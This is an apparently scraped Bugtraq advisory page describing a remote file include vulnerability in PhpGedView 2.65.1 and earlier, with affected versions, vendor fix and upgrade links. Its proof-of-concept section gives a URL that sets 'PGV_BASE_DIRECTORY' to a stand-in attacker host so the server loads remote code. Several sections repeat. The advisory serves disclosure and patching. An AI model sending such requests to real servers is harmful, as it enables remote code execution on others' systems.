PhpGedView [GED_File]_conf.php Remote File Include Vulnerability
BID:9531
Info
PhpGedView [GED_File]_conf.php Remote File Include Vulnerability
| Bugtraq ID: | 9531 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2004 12:00AM |
| Updated: | Jan 30 2004 12:00AM |
| Credit: | The disclosure of this issue has been credited to Cedric Cochin <[email protected]>. |
| Vulnerable: |
PhpGedView PhpGedView 2.65.1 PhpGedView PhpGedView 2.65 PhpGedView PhpGedView 2.61.1 PhpGedView PhpGedView 2.61 PhpGedView PhpGedView 2.60 PhpGedView PhpGedView 2.52.3 |
| Not Vulnerable: |
PhpGedView PhpGedView 2.65.2 |
Discussion
PhpGedView [GED_File]_conf.php Remote File Include Vulnerability
It has been reported that PhpGedView may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path.
PhpGedView versions 2.65.1 and prior have been reported to be prone to this issue.
This issue may be related to PhpGedView Multiple PHP Remote File Include Vulnerabilities BID 9368.
It has been reported that PhpGedView may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path.
PhpGedView versions 2.65.1 and prior have been reported to be prone to this issue.
This issue may be related to PhpGedView Multiple PHP Remote File Include Vulnerabilities BID 9368.
Exploit / POC
PhpGedView [GED_File]_conf.php Remote File Include Vulnerability
No exploit is required.
The following proof of concept has been provided:
http://www.example.com/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
No exploit is required.
The following proof of concept has been provided:
http://www.example.com/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
Solution / Fix
PhpGedView [GED_File]_conf.php Remote File Include Vulnerability
Solution:
The vendor has released PhpGedView version 2.65.2 to address this and other issues. Users are advised to upgrade to the fixed version.
PhpGedView PhpGedView 2.52.3
PhpGedView PhpGedView 2.60
PhpGedView PhpGedView 2.61
PhpGedView PhpGedView 2.61.1
PhpGedView PhpGedView 2.65
PhpGedView PhpGedView 2.65.1
Solution:
The vendor has released PhpGedView version 2.65.2 to address this and other issues. Users are advised to upgrade to the fixed version.
PhpGedView PhpGedView 2.52.3
-
PhpGedView phpGedView-2.65.2.zip
http://prdownloads.sourceforge.net/phpgedview/phpGedView-2.65.2.zip?do wnload
PhpGedView PhpGedView 2.60
-
PhpGedView phpGedView-2.65.2.zip
http://prdownloads.sourceforge.net/phpgedview/phpGedView-2.65.2.zip?do wnload
PhpGedView PhpGedView 2.61
-
PhpGedView phpGedView-2.65.2.zip
http://prdownloads.sourceforge.net/phpgedview/phpGedView-2.65.2.zip?do wnload
PhpGedView PhpGedView 2.61.1
-
PhpGedView phpGedView-2.65.2.zip
http://prdownloads.sourceforge.net/phpgedview/phpGedView-2.65.2.zip?do wnload
PhpGedView PhpGedView 2.65
-
PhpGedView phpGedView-2.65.2.zip
http://prdownloads.sourceforge.net/phpgedview/phpGedView-2.65.2.zip?do wnload
PhpGedView PhpGedView 2.65.1
-
PhpGedView phpGedView-2.65.2.zip
http://prdownloads.sourceforge.net/phpgedview/phpGedView-2.65.2.zip?do wnload
References
PhpGedView [GED_File]_conf.php Remote File Include Vulnerability
References:
References:
- PhpGedView Homepage (PhpGedView)
- PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior (Cedric Cochin
)